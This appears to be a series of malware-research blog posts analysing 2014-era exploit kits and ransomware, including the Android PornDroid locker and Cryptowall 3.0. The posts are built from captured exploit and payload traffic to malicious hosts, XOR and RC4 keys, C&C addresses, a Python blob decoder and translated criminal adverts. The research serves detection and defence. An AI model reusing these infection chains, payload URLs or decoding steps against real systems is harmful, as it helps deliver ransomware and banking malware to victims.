GET http://asset.yur88 .com/xawufyinv3lqr.html
200 OK (text/html)

To give an idea of the data sent to the exploit kit
in the following POST request (md5 is different)

POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..
200 OK (text/html)

Astrum - 2014-09-06
Piece of the POST reply launching the Silverlight and CVE-2013-2551 attacks
The Silverlight call, once decoded:

Astrum : Post reply silverlight call once decoded
2014-09-06
http://pastebin.com/enPjFN96


GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA..
200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce

Silverlight Exploit

GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w..
200 OK (application/octet-stream)  9d9eb3ceffd6596ebdf7fc9387cd5cb1 Reveton again
Xor key : BFAD0475157E8E15F72903B5E80649B2 

CVE-2013-2551 :


CVE-2013-2551 successfully fired by Astrum EK
2014-09-11


GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html
200 OK (text/html)


POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..
200 OK (text/html)
After a first pass of decoding :

Piece of CVE-2013-2551 after first decoding pass.
http://pastebin.com/g847kaSX



GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..
200 OK (application/octet-stream) a668806b4be0e3b02e3adf0130b70bd0 once decoded (reveton)
Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6

Payload written to %temp%\tmp1.log


If the lock screen is activated you'll get, for instance in the US:
Reveton - Screen locked - 2014-09-11 US.

CVE-2014-0322 :
For some reason I couldn't get that one working properly.

CVE-2014-0322 fired by Astrum
but unsuccessful.
I'll update if I get a successful pass.

GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html
200 OK (text/html)

Posted data after the landing, telling the server to try
CVE-2014-0322 (md5 is different)


POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..
200 OK (text/html)

Obfuscated piece of code to trigger CVE-2014-0322
Astrum 2014-09-11
I won't post the decoded one ;)

Piece of the B64 encoded shellcode


CVE-2010-0188 :


Astrum firing CVE-2010-0188 (and the Flash exploit as well)
2014-09-11


GET http://assets.dance .com.ar/oljm3dz7pnh.html
200 OK (text/html)



Decoded posted data


POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..
200 OK (text/html) 

Encoded part of the Post reply in charge of the call for CVE-2010-0188
Astrum - 2014-09-11
Once decoded :

Iframe called for CVE-2010-0188


GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..
200 OK (text/html)


Obfuscated: creation of the PDF object
Decoded:

Deobfuscated call for PDF


GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..
200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)

GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..
200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a

We have the same kind of obfuscation here as in the landing and the POST response.

Object in the PDF containing the Encoded data

Piece of JS in charge of deobfuscating and triggering the exploit


GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..
200 OK (application/octet-stream)

GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..
200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton

Note that both payloads (Flash and PDF) in that pass have the same XOR key (919DCE47A3DBD2518B2F1088604AE0DA)


No Java ?

This exploit kit had some Java a few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465; if you search for this IP in your logs you might find it) but it seems Java is not exploited anymore.
As I assumed for Flash EK, it's trading a now small percentage of infections for more stealth (the infection chain lasts longer, so fewer rebuilds).


The exploitation graph should be something like:

Astrum EK - Exploitation graph assumption
2014-09-14


Files :
AstrumEK 4 pcap (Owncloud), thanks to Fiddler2Pcap written by Will Metcalf (Emerging Threats)

PS: If you have some telemetry on this IP, 107.150.24.107, I would be really interested in the numbers. Seeing the infection path, I think the traffic should be quite big.

CVE-2013-7331 and Exploit Kits



Thanks to EKWatcher and his decoding skills for saving me a lot of time.

As we see more and more of those "XMLDOM" checks in exploit kits, I decided to write down some of the checks spotted. This is a fast-moving area and it will be hard to keep this up to date, but it may give an idea of how the technique is being used.

Angler EK:

http://pastebin.com/EAKZk43e  2014-10-01
Previously :
http://pastebin.com/pzx2xPDJ 2014-08-23


Astrum EK :






http://pastebin.com/PfAjuvPR 2014-09-06

Nuclear Pack :







Read more:
Attackers abusing Internet Explorer to enumerate software and detect security products - Jaime Blasco - AlienVault - 2014-07-25

CVE-2014-0556 (Adobe Flash Player) integrating Exploit Kits



A proof of concept (for Flash 14.0.0.145) for a heap-based buffer overflow patched on September 9th, affecting Flash 13.0.0.x < 244, 14.0.0.x <= 179 and 15.0.0.x < 152, was published on September 30th on Packet Storm. Code targeting that CVE is now in Nuclear Pack.

Nuclear Pack :

Spotted on 2014-10-19, but I thought illustrating it with a top-500 worldwide website (the owner will explain that it has been abused again... strange timing, no?) would better put things in perspective.

<edit>
For people thinking I "forgot" to credit Threat Glass for the referer: take a look at the vote timestamp on the payload ;)
</edit>

Beeg .com leading to Nuclear Pack and Cryptowall
Successful CVE-2014-0556 pass in Nuclear Pack 2014-10-20

GET http://axxesopri .ml/305d439amjgij.html
200 OK (text/html) d0806f81d4aaada74228ac352b463c05


Here is another fresh Nuclear Pack landing after a first deobfuscation pass:
http://pastebin.com/8U1rPbF7

CVE-2014-0556 related piece of Code in Nuclear Pack


GET http://axxesopri .ml/e109e3265b7emjgij/1413764940
200 OK (application/octet-stream)   23efdf5481fcd364559b0949a25c747d CVE-2014-0556 - Confirmation by @TimoHirvonen

GET http://axxesopri .ml/e109e326mjgij/1413764940/7
200 OK (application/octet-stream) d0806f81d4aaada74228ac352b463c05  - Cryptowall

--------------------------------

[Public Mail Reply]
How can I manage the updates for free and in a reliable way?
You can consider using open-source tools like WPKG to spread the update and OCS Inventory NG to ensure that the update campaign has been fully successful (and to track the glitches).
In a multi-site environment a well-thought-out DFS setup may help push the WPKG/update package to all remote sites. Then new Flash/Java/Reader updates can be handled in a few minutes (comments welcome).


Files: Nothing yet.

Read more:
Exploiting CVE-2014-0556 in Flash - 2014-09-23 - Chris Evans - Project Zero
Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow - 2014-09-30 - Packet Storm

CVE-2014-0569 (Flash Player) integrating Exploit Kit





<this post has been edited multiple times to fix some errors and bring in new elements; it may still change>

My goal was to grab CVE-2014-0556 when I landed yesterday on Fiesta, but according to @TimoHirvonen it's CVE-2014-0569, fixed only one week ago, that was fired here. That is a really fast integration into an exploit kit. I've been told it landed in Fiesta after its coder reversed the patch (in 2 days).

So you know what to do: ensure Flash Player is up to date (15.0.0.189; for IE10/IE11 users the patch to check is KB3001237).

Fiesta :



CVE-2014-0569 successfull pass in Fiesta EK
2014-10-21
Fiesta Logo Courtesy of FoxIT.


GET http://rvdcgyisqy.myftp .org/jjcv7antdqqollz6mqusrbwjcu3z1835zzuurupwvyxdsy
200 OK (text/html) 


"Relevant section from Fiesta landing page : http://pastebin.com/K4gbQWpS" By Jason in comments

GET http://rvdcgyisqy.myftp .org/cp9ne2q/4f25f1a50659fee801500b0e540a50040053040e5253510e0152060357535850;150000;144
200 OK (application/x-shockwave-flash) 254690dd89055c46f1a60713dbc26965 
CVE-2014-0569

GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7
200 OK (application/octet-stream) 2b74a966466d612b069161b4fdd0f775 Payload : Ropest (thx @Horgh_rce )

GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7;1
200 OK (text/html)


Files : Nothing Yet.
Fiddler sent to VT here : 9bb6292633f4eccd54aeb23ad3555507

Angler EK :


[Edit 2014-10-22: It appears this could be another CVE (0558, 0564 or something else killed by the last update) than CVE-2014-0569. I'm asking for help to figure it out]
CVE-2014-0569 (?)  fired by Angler EK - 2014-10-21
Followed by Bedep activity and a Zeus Variant
GET http://three.creziontyro .in/qsx0jugfgk
200 OK (text/html) After a first pass of deobfuscation: http://pastebin.com/tnRKArFz (thanks as always to @EKWatcher). Update coming later, maybe.

GET http://three.creziontyro .in/J-XQctybYriag-bOGIcSDh-HchIdpmXKk_M52H6bO6Y7NsJMsSIWWvNTG-R0tdBR
200 OK (application/x-shockwave-flash) d54a6cca8b6b52f6ed47769ba6397444 CVE-2014-xxxx

GET http://three.creziontyro .in/KxYioLx6A_QJguVdGPUpkrc6lJWbIWICBCyS8LR7X3pDLnTugBkW7GVC1vXjAtFj
200 OK (application/octet-stream)  Stream containing Shellcode and Bedep.

Target Payload : 831098a9d8db43bebf3d6ee67914888d  Kins Variant (Thanks to @maciekkotowicz who wrote about it on Kernelmode)

Files: Nothing Yet.
 Fiddler sent to VT here : 6c0cd2dae5c43f92d86411977bb28b08

Astrum EK:

So Astrum is owning Flash 15.0.0.152. It seems the same not-yet-identified CVE (fixed 10 days ago by the last Flash Player patch) seen in Angler EK is being used here as well.

Astrum EK exploiting Flash 15.0.0.152 to push Miuref AdFraud
2014-10-24

(Once again, sorry, I don't have enough time yet to study this in detail.)

GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)

POST http://b.kok44 .com/nlPPOoTJIWP0MPcC66tPW6E881Kxrk4JpG3zUe7-T16vY_BTuvYfUu118wO64AEI8g..
404 Not Found (text/html)

GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)

POST http://b.kok44 .com/YYclWjoL_Ppe6BRhUmbCkQ7uSWFZaMeRW-0UZ1I9lZYMvEtmAjeXkRKhGWMEItyRDQ..
200 OK (text/html)

GET http://b.kok44 .com/iajJ15EwZW62x_js-V1bBebBpezyU14Fs8L46vkGDALkk6frqQwOBfqO9eysGUUF5Q..
200 OK (application/x-shockwave-flash)  99a8b37fcd995f859e2b7e22ce8fe72b CVE-2014-05xx ??

GET http://b.kok44 .com/pYU3o8dIJ8ma6gaYryUZosrsW5ikKxyin-8Gnq9-TqXIvlmf_3RMotajC5j1YQeiyQ..
200 OK (application/octet-stream) After deobfuscation: 3ef89107362630d2ad56e7bef5a717fc Miuref AdFraud (cf. former Partnerka.me)

Files: Nothing Yet.
Fiddler sent to VT here : 5e9abc8ef40bb98afb00e40f12958919

Sweet Orange :


A pass with Firefox and Flash 15.0.0.152 seems to confirm that. CVE-2014-0569 confirmed by Kaspersky. Simon Choi told me he also got a successful pass with IE 11 / Flash 15.0.0.167 on Windows 8.




GET http://pirat.svanager.wielun .pl:8080/elements/film.php?london=274412&desktop=209908&advocacy=17&bloggers=22666&free=56481&articles=178642&other=287691
200 OK (text/html)

GET http://pirat.svanager.wielun .pl:8080/elements/xrbolXSHx
200 OK (application/x-shockwave-flash) 6d5591ef4d3ddb1c0b47d52a58e36036


GET http://pirat.svanager.wielun.pl:8080/backup.php?lang=1341&topics=12&voip=505&myguest=1251&math=1377&down=2386&game=2511
200 OK (application/octet-stream) Kovter bc8e0c39cc66da9c2caee65bd3a70882

Files: Soon. After Nuclear Pack integration.

Flash EK :

CVE-2014-0569 fired by a "full" Flash EK on 2014-10-28


GET http://tinsinarbetrab .eu/xs3884y132186/index.php
200 OK (text/html)

GET http://tinsinarbetrab .eu/xs3884y132186/js/swfobject.js
200 OK (application/javascript)

GET http://tinsinarbetrab .eu/xs3884y132186/banner.swf
200 OK (application/x-shockwave-flash) Filtering advert 8124c71afe59779e181c52857f990103



POST http://tinsinarbetrab .eu/xs3884y132186/gate.php
200 OK (text/html)

GET http://tinsinarbetrab .eu/xs3884y132186/Main.swf
200 OK (application/x-shockwave-flash) 93bd68ff7112244d19030d360e9b2108 CVE-2014-0569 identified by Timo Hirvonen


GET http://tinsinarbetrab .eu/xs3884y132186/lofla1.php
200 OK (application/octet-stream) Necurs 96f0f62f798987fb0dd3427182775ef7

Files: Soon.


The worst of Windows "Police Locker" is also available on Android

Sad Danbo
Author: Erik mit k 


One year ago, I blogged about a nasty evolution of Kovter using a sick method to make sure people are shocked and in enough doubt to pay the ransom.

A week ago, while doing some Android browsing to check how some "desktop world" badness would behave on mobile, I was pushed a pseudo porn application.

Usual referer for some Reveton Angler EK Thread tested on Android
pushes an APK after plugrush mobile badvert


So without user interaction nothing will happen: just a dirty APK on your phone.
Now if you decide to install what pretends to be PornDroid:

Note the "Read your Web bookmarks and History"
and some permissions unknown to me till now:
"Reorder Running Apps", "Draw Over Other apps"
Then if you launch it you are asked to grant it "Device Administrator" rights

Fake "PornDroid" trying to convince you that it needs "Device Administrator"

If you activate it here is what will be shown in the Settings :

"These privileges are needed to protect your device from
attackers, and will prevent Android OS from being destroyed."
In the background a webpage containing child pornography is shown.

All images are linked to Videos that are indeed on the Server.
Captured Traffic between Launch and Lock
Then the phone is locked.

500$

You can expand each Block and get details
Usual Money Pack payment system
Can take photos
Images that have been pushed to the user are now
shown as "evidence". Browsing history is available here too


This screen for the upper part
4 CP/Zoo images are presented as evidence
I was wondering if the images were taken from the cache or something, but they are in fact downloaded, encrypted together with the design, in the first 400 KB call (so even before the website is displayed).




What's missing? Oh yes... Prism.

I didn't analyse the APK deeply, but the first HTTP POST is really big.
I wouldn't be surprised if contacts, browsing history etc. were pushed to the C&C.

From what I saw this is focused on the USA.
Launching the APK from another country, you get the sick webpage and the call to the C&C, but no lock.
Browsing the same referer from France and Great Britain at that time, I landed on some fake (?) antivirus stuff like:



Files: Nothing. But here is an md5, be4ad7e9140646a31099780c62a34bca, from when I discovered it, and a fresher one: c03e2d5712cb5d738f06bfd79b9be12a
It seems the main name coming up is Koler, but I wouldn't say it's the same team behind this and the Koler featured here before and in the last AdaptiveMobile post.




CVE-2014-8440 (Flash up to 15.0.0.189) and Exploit Kits



Once again, that's fast. Nine days (or less?) after the patch,


the vulnerability is being exploited in blind mass attacks. No doubt about it: the team behind Angler is really good at what it does.

Angler EK :

Thanks to Kaspersky for CVE identification.

CVE-2014-8440 successfully exploited by Angler EK
2014-11-20
I won't go into details.
The sample is: 8181b7da3a53a7a6c1d23f852e85c446
Two Fiddler captures (Firefox and IE) pushed to VT: Fiddler_Angler_CVE-2014-8440_Password_is_malware.zip

[Edit : 2014-11-26]
This CVE, which was used only in a specific (VIP?) Angler instance, has been propagated to all Angler EK threads with 02d48a05c15f55a085be296ed12a5ed7 this afternoon.


Neutrino : The come back ! (or Job314 the Alter EK)




Disclaimer: Once again I won't go into a deep analysis of the EK in this post.
It's more of a connecting-the-dots one.
Big thanks: Timo Hirvonen, @Malc0de, @EKWatcher, @node5 for all the help on this.


In September a post from Alter appeared on an underground board. He was looking for traffic to test an exploit kit he was building.

-----------------------
(translated from Russian)
Hi all.
We are looking for someone with a large and stable flow of traffic from their own hacked sites.
The traffic is needed for debugging and fine-tuning the exploit kit.
What exactly is required:
A delivery speed of 1k hosts in 3-5 minutes.
Access to a TDS or any other panel where I can switch the traffic to the kit's test stream on and off myself, whenever convenient for me.
The TDS must support an auto-fetch API.


From our side:
One month on a dedicated server for free
Subsequent rental on preferential terms


A private solution with a limited set.
We'd welcome a serious person with a reputation.
Contact via PM.
-------------------------

On the 26th of September I spotted something that was a really good candidate for an "Alter EK".

Alter EK candidate - 2014-09-26
Many things pointed to Alter EK:
- the chronology (we do not see new patterns really often)
- the payload was calling back to the EK
and other hints (traffic filtering upfront) confirmed a "training range".

Talking with Will Metcalf from Emerging Threats, we decided to name that exploit kit Job314 (cf. the Knock part).

Some new tricks there: the Java calls were embedded in the Flash.
Same for CVE-2013-2551 (IE), embedded inside the Flash.

We saw it evolve over the following weeks.

Job314 - Test Thread - 2014-10-20


A week ago Alter published a new advert :

----------------------
(translated from Russian)
Private exploit kit with a high infection rate and consistently low detection.
Monthly rental from $3000
Rental on dedicated servers only.
Domains and fronts are not included in the rental price.
No information is provided on which exploits it contains.

A one-day test is possible for $100 (50k hosts).
Escrow only through this board's guarantor, at your expense.

Jabber: s@userjab.com
-----------------------

The big surprise was in the screenshot:

Alter EK screenshots - Neutrino !


So after disappearing around the 17th of March, Neutrino is back!

Rebuilt from scratch, it seems, and what we called Job314 is this Neutrino "2".


Today, checking a distribution path usually redirecting to Flash EK (Necurs in /sv62a76d18537/)

Distribution path to Necurs via "script" redirector and Flash EK
2014-11-15
and then, after a few days of Angler EK with Necurs pushed by Bedep, I landed on:


Neutrino Pushing Necurs
2014-11-20 (and drops callbacks)

Let's take a look at this

Neutrino Pass:


Neutrino - 4 CVE in 1 Flash



GET http://amtudatqfi.border2 .xyz:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/cart/51566/peter/shove/solitary/labour/squat/glad/
200 OK (text/html)

Neutrino Landing - 2014-11-20
http://pastebin.com/ssgay7Zn
Straight to the Flash.
Unescaping the B64 blob and applying the RC4 key we can find in the Flash:

RC4: lrnfsvobuudc


We get :

Path fired for each exploit
note the payload Key: uzxceruvsl


The different URIs for the different exploits.
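The two decoding steps above (the landing blob under the Flash's key, the payload stream under the payload key) in plain Python, added here as an example; it is not Neutrino's ActionScript, and the config text and "payload" it decodes are constructed for the demo rather than taken from the capture:

```python
"""RC4 decoding for the Neutrino exchange: the landing carries a JS-escaped,
Base64-encoded blob encrypted with the key found in the Flash, and the
payload is served RC4-encrypted under a second key. Added example (textbook
RC4 in pure Python), not Neutrino's own code; SAMPLE_* values are constructed."""
import base64
from urllib.parse import quote, unquote

LANDING_KEY = "lrnfsvobuudc"   # key found in the Flash (from the post)
PAYLOAD_KEY = "uzxceruvsl"     # payload key shown in the decoded config


def rc4(key: bytes, data: bytes) -> bytes:
    """Key scheduling, then XOR the keystream over data. Symmetric."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_landing_blob(escaped_b64: str, key: str = LANDING_KEY) -> str:
    """Reverse the landing's wrapping: JS unescape -> Base64 -> RC4."""
    return rc4(key.encode(), base64.b64decode(unquote(escaped_b64))).decode("utf-8")


def decode_payload_stream(blob: bytes, key: str = PAYLOAD_KEY) -> bytes:
    """The octet-stream served after a successful exploit, RC4 under the payload key."""
    return rc4(key.encode(), blob)


# --- constructed sample data (not a real Neutrino capture) ------------------
SAMPLE_CONFIG = '{"cve-2014-6332":"/dark/9844/watch/5350/","key":"' + PAYLOAD_KEY + '"}'
SAMPLE_ESCAPED = quote(
    base64.b64encode(rc4(LANDING_KEY.encode(), SAMPLE_CONFIG.encode())).decode(), safe=""
)
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"constructed stand-in, not Necurs"
SAMPLE_STREAM = rc4(PAYLOAD_KEY.encode(), SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print(decode_landing_blob(SAMPLE_ESCAPED))
    print(decode_payload_stream(SAMPLE_STREAM)[:2])
```

On a real pass, the escaped blob comes out of the landing's JS, the keys out of the Flash, and the decoded octet-stream should start with "MZ" if the key is right.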

GET http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
200 OK (text/javascript)

GET http://amtudatqfi.border2 .xyz:47130/dark/9844/watch/5350/slip/64080/explanation/41483/mend/93598/collapse/39865/model/25005/
200 OK (text/html) Flash containing at least CVE-2014-6332, CVE-2013-2551, CVE-2014-0515, CVE-2014-0569   7a5f2d7efe55020e65dcdd77bcdf853e

The four RC4-encrypted exploits embedded in the single Flash
Neutrino 2014-11-21

GET http://wyuye.border2 .xyz:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/downstairs/grand/military/measure/themself/65550/
200 OK (application/octet-stream) RC4-encoded (key: uzxceruvsl) Necurs f185111b2b0c61b26f2cdae1fee81031


Note : User-Agent: Mozilla


Based on what we saw earlier we can say that it's CVE-2014-6332 that owned that VM.

GET http://wyuye.border2 .xyz:38779/sweet.pl?whistle=word&more=start&wick=pressure&gasp=warm&join=victim&proper=52499&camera=44137&overhead=19904
404 Not Found (text/html) < CVE-2014-0569 call. 404ed maybe because of the 200 OK on the previous call.

File: That Flash is well thought out and seems easy to reuse, so I will hold on to it.
Fiddler pushed to VT here.
2014-11-24 - SWF: 19a6ef1cf490aec30018d95a4f07f42a
Let's finish with one piece of advice from Will Metcalf (Emerging Threats):







CVE-2014-6332 (Internet Explorer) and Exploits Kits




For this CVE refer to:
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in an exploit kit was in the Sweet Orange from the actor pushing DarkShell via compromised KR websites. The landing provided by @MalwareSigs on 2014-11-19 already contained CVE-2014-6332.


So this actor:
DarkShell pushed by Da Gong CK VIP (cf. comments) via CVE-2014-0515
2014-09-28
that we saw moving to Sweet Orange:



Sweet Orange :

The URL patterns are different, but at a given time the modifications are similar on both...


Da Orangade firing CVE-2014-6332 and DarkShell Call back
2014-11-19
GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
2014-11-19
A replace, then a b64decode on the second b64 blob, and we have:

CVE-2014-6332 in Sweet Orange
2014-11-19
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)

Here is a more "standard" Sweet Orange:

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
2014-11-21
File: You'll find a PCAP illustrating this here:
http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)

Neutrino :

Neutrino firing CVE-2014-6332 embedded in a Flash
2014-11-20

Please refer to this post : Neutrino : The come back !

Archie :

First spotted by Will Metcalf, here is CVE-2014-6332 in Archie

CVE-2014-6332 - 2014-11-24
Decoded b64 here http://pastebin.com/EhpdrZvy
Fiddler here


Call me Null Hole maybe ?



Disclaimer: I won't study this one in detail. The global logic should not be far from Styxy Cool or Styx itself. Once again, just a "connecting some dots" post.

For many months, what I was mentally naming "Weird Styx", which was really similar to Kein/Styx Kein, puzzled me.

2013-01-22 - "a Weird Styx"

This was as Styxy as an exploit kit can be... but not as randomized as Styx was.
Exploits were rotating really slowly, as in Kein.

I would not be surprised if the coder of the exploits/scheme of Styx, Styxy Cool, Kein and Null Hole is the same.


Null Hole - Login Page
Null Hole - API call (used for instance by a TDS to get the actual landing)

Null Hole - Raw Stats on one Thread


Null Hole - Partner management
Null Hole. A bunch of Sploits.



Null Hole - Manage Clone (vhosts/proxies)
You remember the signed Cryptowall that got some attention a month ago?

It was pushed in both Nuclear Pack and Null Hole.

This is the Null Hole thread :

Null Hole 2014-09-29


The number of victims of that thread: 770.

{"objects":[{"blocked":9963,"loads":770,"raw":47506,"stream_id":"9","unique":20584,"withdrawn":0}]}

This exploit kit seems to be blinking: used for a few weeks, then it disappears for a month or two.

Here is a fresh pass (thanks to @robemtnez):
Null Hole - 2014-11-17
Here firing CVE-2014-0515, CVE-2014-0569 (thx TimoHirvonen)
and CVE-2013-2551

2014/11/17 20:18:09;camping.ycw94.com;80;198.50.27.162

Files :
You'll find a pcap from Brad here.

                       

Critroni += NL and IT

CTB Locker += NL & IT



Studying the Revslider infection schemes, I got redirected via "Revslider Case 3" (cf. the Sucuri blog post) to Nuclear Pack

Revslider Case   3 - Path to Nuclear Pack delivering Critroni
2014-12-28


Decoded payload: 10f0eaa794f48ad0b15034e0683cb15f

It's CTB Locker aka Critroni.

What is new to me here is the random extension given to encrypted files:

Encoded RTF with unique extension

Files dropped in My Documents
(background wallpaper and decryption explanation)


And the integration of two languages: NL and IT

Critroni -  First Screen NL
2014-12-28
Critroni - First Screen IT
2014-12-28
Critroni - Test Explanation - NL
2014-12-28
Critroni - Test Explanation - IT
2014-12-28

Critroni - Decryption Test - NL
2014-12-28



Bitcoin Address Screen - NL
1AjhFhf7rE2V3sKmTxoK7t6M7aaymTrt5G 

BTC explanation - NL
2014-12-28 


Files: Critroni_NL_IT.zip (Fiddler and payload)

Inside Android LockOut System aka PornDroid



When I wrote "The worst of Windows "Police Locker" is also available on Android" I thought this was a "rare" threat, not really likely to achieve its goal.

I was wrong.

It did not take long for "Porndroid" to become the first keyword for incoming traffic to this blog.
So I thought that "Porndroid" was maybe associated with legit pornography on Android... but no... so I understood that this ransomware was probably more widespread than expected.

And indeed, I found a TDS pushing around 500k visitors a day to fake porn websites designed for mobile, with fast-rotating domains and paths (to play whack-a-mole with defenders and avoid replay).

TDS redirecting to Porndroid Ransomware
Traffic between 2014-19 and 24
This TDS is still live and kicking

Traffic is coming from ExoClick, EroAdvertising, Plugrush etc., so mostly badverts.

Since my last post an additional step was added:

Advice on how to install the PornDroid "video player", or
how to get SocEng'd and ransomed
But it seems that in their latest move (this week) they switched to a Browlock-style landing repeatedly prompting to install the downloaded "video player".


Piece of code of last version of the PornDroid Landing
Alert now shown by the Landing


The ransomware is not grabbing the fake page via an external call anymore. The content is embedded in the APK, which explains why it's "meaty": 1 MB.


Permissions changed a little

+ Find Accounts on the Device
+ modify the contents of the SD card
- Read your Text message
- Read Bookmark and History

Identical to  previous post

The explanation for the "Administrator Rights" prompt has been tuned to:
XXX Video (PornDroid) prompting for Administrator Rights. Reason?
"Set Storage Encryption"
If you accept, the malware is launched immediately.

Screen lock after click on any video is the same :

PornDroid - LockScreen
Same "proof" of illegal activity :


etc.. (see this post for more screens of the ransomware itself)
Many servers were/are acting as C&C for this mobile ransomware.

Here are some :

217.12.221.236
192.240.96.236
apimapu.net ( 64.187.225.228 )
apimapq.net ( 37.1.213.175 )
107.181.174.23
192.240.96.254
50.7.71.99
64.187.225.228

The admin login looks like:

Android LockOut System - Admin Login Page


Here is one panel :

PornDroid/LockOut System Panel - Main

And another one :


One more



I won't add more "Main" screenshots as those three are representative.

The following screenshots come from different panels at different times; don't try to "connect" them together.


Android LockOut System - Stats per day


Android LockOut System - All bots
4-5 infections per minute when taken
Android LockOut System - All Codes
Other valid Replies :

Moneypack Replies
Commands
Gathered Accounts


Android LockOut System - Sent Command


Android LockOut System - Domains

Big figure:
  • Target: mostly US
  • Cumulative number of infections in December: between 180k and 240k
    (why is no-one talking about that if it's "that" widespread? It's about shame. If you see the "proof" tab you understand)
  • Average number of devices locked daily: 7k
  • Percentage of people paying: between 0.4 and 1%
  • Money: at least half a million $ in vouchers in December (note: $ in vouchers is not $ in the operators' pockets)
It seems servers are changed every 30-40k infections.

Not all the data is shared here (missing: main actor nickname, adverts, domains, screenshots). So feel free to contact me if you are a researcher or want to act on it (use a pro email, no gmail/yahoo/mail.ru etc. accounts).
---
Thanks to @Malwageddon for some translation hints.

Files:
4 samples in a Zip sent on VT

Read More:
The worst of Windows "Police Locker" is also available on Android 2014-10-28

Extra:
For those who did not see it, Idan Revivo and Ofer Caspi from Checkpoint shared on GitHub "A Cuckoo Sandbox Extension for Android". Thanks !!
Porndroid in Cuckoo Sandbox extension for Android
(you can get better results than what is shown here; this was a basic install)




Guess who's back again? Cryptowall 3.0

Help_Decrypt.html Title


Thanks: @Horgh_RCE for all the reversing work
(If I am wrong that the last ITW Cryptowall 2.0 sample is from 2014-11-18, please contact me. I'd be happy to fix it.)

And almost two months after the last sample... the reply is sadly no.

Today:

Magnitude: 2015-01-13
One payload only (which does not happen that often)

And here is what I saw in the network quarantine (and later everywhere it could find files to encrypt):



Cryptowall - French instructions.
3.0
Here in English from another infection (Note: you'll get the png image with the translation that fits your geolocated IP).





One bunch of links:
http://paytoc4gtpn5czl2.torforall.com/1c3L59z
http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

The "Decrypt 1 file for free" option is still here (yep... this option did not first appear with CoinVault ;) )

Cryptowall Decrypt Service.

Bitcoin addresses I saw (same infection vector):
15qZLHkcgGnqaBByno2nq6ufa1og3PjnxU
1JYYzNHDaGC7noiE4eKatuYA4AThqVocDd


It uses those services to get its external IP:

"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"



It seems communication with the C&C is RC4 encoded (the key seems to be the alphanumerically sorted path of the POST) and goes over i2p:

Cryptowall 3.0 communications with C&C
(pcap by @Horgh_RCE)


--------------Slightly Edited-------
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
